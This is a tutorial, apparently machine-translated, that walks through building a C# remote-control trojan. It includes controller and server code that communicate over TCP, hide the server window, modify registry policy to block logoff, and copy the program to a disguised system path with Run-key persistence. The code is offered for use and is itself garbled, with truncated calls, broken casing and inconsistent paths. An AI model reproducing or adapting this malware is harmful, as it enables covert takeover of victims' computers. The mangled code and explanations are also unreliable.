C # implement the trojan program

Use C # To implement Trojans Program (1) Introduction of Trojans: (refer to the principle of Trojan horse in the black line-) because this program is a trojan program, some basic knowledge about Trojan Horse composition is described in advance, this is because the content is mentioned in many places below. A complete
The trojan system consists of hardware, software, and connection. This section mainly introduces the software, including the control end program and Trojan Program (Background Service Program
), Trojan preparation program composition. The control end is used to remotely control the programs on the server side. The Trojan program is a program that sneak into the server side to obtain its operation permissions. The Trojan preparation program
Set the trojan program's port number, trigger condition, Trojan name, and so on, so that it can be hidden on the server. The technology used: the control terminal sends control code to control the server, the server runs in the background, and the registry is modified to control the server. The technology is not very difficult, mainly reflecting the network programming and
Modify the registry. Control side development: the control side sends a control code to the server. After receiving the control code, the server (Trojan program) completes the specified requirement according to the control requirements. If the server completes the work
. Control-end development: You can set the control code by yourself. You do not need to explain it in detail. The main difficulties are as follows. 1. The connection request is used.. Net class. net. sockets. tcpclient class, tcpclient (string hostname, int port) hostname is the name of the host to be controlled, of course, you can also use an IP address. Port is a port. // System. eventargs contains the basic class private void button7_click (Object sender, system. eventargs e) {// record the operation. In the RichTextBox Control, add the operation information richtextbox1.appendtext ("request connection" + textbox1.text + "\ r"); int Port = 6678; try {// initialize a new instance of the tcpclient class and connect to the specified port client = new tcpclient (textbox1.text, Port) on the specified host;} catch {MessageBox. show ("the server is not online! Are you sure you want to enter the host name. "); richtextbox1.appendtext (" the server is not online! Are you sure you want to enter the host name. ") ;}// private void buttion 2 to test whether it is connected to the controlled machine. The process of the program is to send the control code to check whether the control side has a response. If a response is returned, the control is successful. // Provide the data stream for network access // Private networkstream; Code Private void button8_click (Object sender, system. eventargs e) {// record operation richtextbox1.appendtext ("test connection" + "\ r"); try {stream = client. getstream (); If (stream. canwrite) {// sending control code string control = "jiance"; byte [] by = system. text. encoding. ASCII. getbytes (control. tochararray (); stream. write (by, 0,. length); // use stream next time. flush (); // start the thread that receives the reverse data. // receive is the function executed by the thread. For details, see threadreceive = new thread (New T Hreadstart (receive); threadreceive. start () ;}} catch (exception ee) {richtextbox1.appendtext (EE. message + "\ r"); MessageBox. show (EE. message) ;}} 3 control the effective code private void button9_click (Object sender, system. eventargs e) {// The control code to be sent. radiobutton is the form control if (radiobutton1.checked) {control = form2.zhucex;} else if (radiobutton2.checked) {control = form3.zhuces ;} else if (radiobutton3.checked) {control = W Arring;} else if (radiobutton4.checked) {control = suggest;} else if (radiobutton5.checked) {control = form4.mumawe;} else if (radiobutton6.checked) {control = drop ;} if (control = "000000") {MessageBox. show ("You didn't enter any control targets! Do not send control signals "); richtextbox1.appendtext (" You have not entered any control targets! No control signal ");} else if (control! = "000000") {try {// record operation richtextbox1.appendtext (Control + "is trying to control, waiting for response ...... "+" \ r "); stream = client. getstream (); If (stream. canwrite) {byte [] by = system. text. encoding. ASCII. getbytes (control. tochararray (); stream. write (by, 0,. length); stream. flush (); threadreceive = new thread (New threadstart (receive); threadreceive. start () ;}// endif} // try catch {richtextbox1.appendtext ("the server is not connected to 1. The control is invalid! "+" \ R "); MessageBox. Show (" the server is not connected to 1. The control is invalid! "+" \ R ") ;}}// else if} 4 the function private void receive () executed by the thread () {// set the Data Reading space byte [] BB = new byte [3]; // read 3 bytes, I is the actual number of bytes read int I = stream. read (BB,); // convert to a string. If it is a Chinese control code, use string Ss = // system. text. encoding. unicode. getstring (bb); string Ss = system. text. encoding. ASCII. getstring (bb); // HJC indicates that the Returned Code of the server I set HJC indicates that the connection is successful, and hkz indicates that the control is successful. If (Ss = "HJC") {MessageBox. show ("connection successful"); richtextbox1.appendtext ("connection successful");} If (Ss = "hkz ") {richtextbox1.appendtext (Control + "control succeeded" + "\ r"); MessageBox. show (Control + "control succeeded" + "\ r") ;}} server development: to implement the trojan service program, mainly implement the following functions: background operation (hiding technology), control code receiving, and registry modification.
Introduction: 1. in VC #, it is easy to create a background service program. First, create a new C # windows application, and set the project name (however, to hide
System name), set the "showintaskbar" attribute of the form attribute to false, so that it will not be displayed in the taskbar during running, and the attribute "windowstate" is
Set it to mininized, so that the form can be hidden and run. You can also set it in initializecomponent (). This function is used for initialization.
Run the following code before the body is displayed: Private void initializecomponent () {// form1 // the start point and size of the form display this. autoscalebasesize = new system. drawing. size (6, 14); this. clientsize = new system. drawing. size (368,357); // form name this. name = "form1"; // set the attribute to run this. showintaskbar = false; this. TEXT = "form1"; this. windowstate = system. windows. forms. formwindowstate. minimized;} 2. to control the receipt of code, it is necessary to start the service program at the beginning of the program running, so the listening thread must start in the program initialization, so it is placed in the form constructor,
The code annotation is as follows: public form1 () // form constructor {// The Windows Form Designer supports the required // initializecomponent (); // todo: after initializecomponent calls, add Any constructor code // Add your listening code // you can set the port by yourself. I use a fixed port int Port = 6678; // system. net. sockets. tcplistener is used to listen to the listener = new tcplistener (port) of the client in the TCP network; // start listening to listener. start (); // Add the thread that receives the control code. To stop a thread, use the thread. abort () // recontrolcode is a function executed by a thread, this function selects the appropriate registry modification function thread = new thread (New threadstart (recontrolcode) based on the received control // control code; thread. start ();} The recontrolcode function is as follows. For the complete code, see program private void recontrolcode () {// set the receiving socket to receive the listener. the acceptsocket returns the received client request socket = listener. acceptsocket (); // If the connection is successful, execute while (socket. connected) {// receive control code byte [] by = new byte [6]; int I = socket. receive (by,. length, 0); string Ss = system. text. encoding. ASCII. getstring (by); // perform different functions based on the control code // modify the registry and add the encoding switch (SS) {Case "jiance": // test the connection, returns the Test message string STR = "HJC"; byte [] bytee = system. text. encoding. ASCII. getbytes (STR); socket. send (bytee, 0, bytee. length, 0); break; Case "zx1000": // modify the registry function. For details, refer to the following analysis for unlogoff (); retmessage (); break; Case "zx0100 ": // modify the registry function unclose (); // Return Control Message retmessage (); break; // The duplicate case function is the same as the previous one, with the default: Break omitted ;} // case} // while} // Private void recontrolcode 3.c# to modify the registry. system. microsoft. win32 command space, which provides two types of classes: processing is triggered by the operating system
And the class for operating the system registry. We can see its usage below. Here I made a subroutine for modifying the Registry: so that the computer cannot log out.
Before that, you must first understand the registry and set the key value nologoff to 1 under the sub-key SOFTWARE \ Microsoft \ Windows \ CurrentVersion \ Policies \ Explorer to prevent the computer from logging out. Use C # In the following function to modify the Registry: Private void unlogoff () {// obtain the top-level node Microsoft of the registry of the host. win32.registrykey rlocal = registry. localmachine; // set registrykey key1, the variable of a registry subkey; try {// function registrykey. opensubkey (string registrykey, bool canwrite) searches for the specified sub-key // registrykey is the key value specified by the user. If canwrite is true, it can be modified. The default value is fasle, key1 = rlocal. opensubkey ("SOFTWARE \ Microsoft \ Windows \ CurrentVersion \ Policies \ Explorer", true); // you can specify the key name and value key1.setvalue ("nologoff ", 1); // close the opened sub-key key1.close (); // set the warning string to mystr = mystr + "HKEY_LOCAL_MACHINE \ Software \ Microsoft \ Windows \ CurrentVersion \ Policies \ Explorer key value nologoff.
Modified! Set it to 0! ";} Catch {} // if there is no self-built if (key1 = NULL) {try {// use registrykey. createsubkey (string mystring) function to create the required sub-key registrykey key2 = rlocal. createsubkey ("SOFTWARE \ Microsoft \ Windows \ CurrentVersion \ Policies \ Explorer"); key2.setvalue ("nologoff", 1); key2.close (); mystr = mystr + "HKEY_LOCAL_MACHINE \ Software \ Microsoft \ Windows \ CurrentVersion \ Policies \ Explorer key value nologoff
Modified! Set it to 0! ";} Catch {}} 4. An important feature in the Trojan program is self-replication and transfer. When a trojan is introduced to a controlled host, it must be automatically hidden in system, system32
. The transfer code is analyzed as follows. The main function is to transfer the trojan program on drive d to C: \ winnnt \ System \ msdoss.exe.
Change the name. The. NET namespace system. Io is used to allow synchronous and asynchronous reading and writing of data streams and files. Here we use the system. Io. File class
. Private void movecc1 () {try {// function file. move (string sourcefilename, string destfilename) indicates the object to be moved. // sourcefilename indicates the object name to be moved and destfilename indicates the new file path. move ("C :\\ winnnt \ System \ msdoss.exe", "d :\\ winnt \ system32 \ expleror.exe ");} catch {} // set the new Trojan to self-start. the analysis is the same as the previous try {key1 = rlocal. opensubkey ("SOFTWARE \ Microsoft \ Windows \ CurrentVersion \ Run", true); key1.setvalue ("microsoftt", "D: \ winnt \ system32 \ expleror.exe "); key1.close ();} catch {} If (key1 = NULL) {try {registrykey key2 = rlocal. createsubkey ("SOFTWARE \ Microsoft \ Windows \ CurrentVersion \ Run"); key1.setvalue ("microsoftt", "d: \ winnt \ system32 \ expleror.exe "); key1.close ();} catch {}}// movecc1 ()